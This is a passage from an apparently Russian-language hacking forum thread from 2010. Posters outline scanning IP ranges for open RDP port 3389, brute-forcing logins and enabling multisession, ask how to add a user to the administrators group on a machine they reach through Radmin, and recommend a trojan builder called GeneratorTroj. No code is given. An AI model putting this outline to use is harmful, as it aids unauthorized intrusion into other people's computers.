Насколько я понел ты хочеш сканить ip на порт 3389. После того как он находит комп брутим. Если удача нужно сделать мультисесию. Для этого нужно запустить ехе. Я тебе предложил на скрине может так можно запусить.

ISkateL!
03.05.2010, 19:26
Подскажите, для sp3 и в частности для сборки ZverCd актуально?

Xeleon
05.05.2010, 05:09
такой вопрос, есть радмин на тачке, пробывал через консоль добавить пользователя, добовляет но не могу засунуть его в админскую групу, пробывал написать скрипт для батника и через консоль выполнить, тожи не получается. Есть еще способ добавить юзера в админ группу ?

noxjoker
05.05.2010, 13:26
Подскажите, для sp3 и в частности для сборки ZverCd актуально?

в программе GeneratorTroj - есть одна из функций Remote Desktop Control работает и на SP3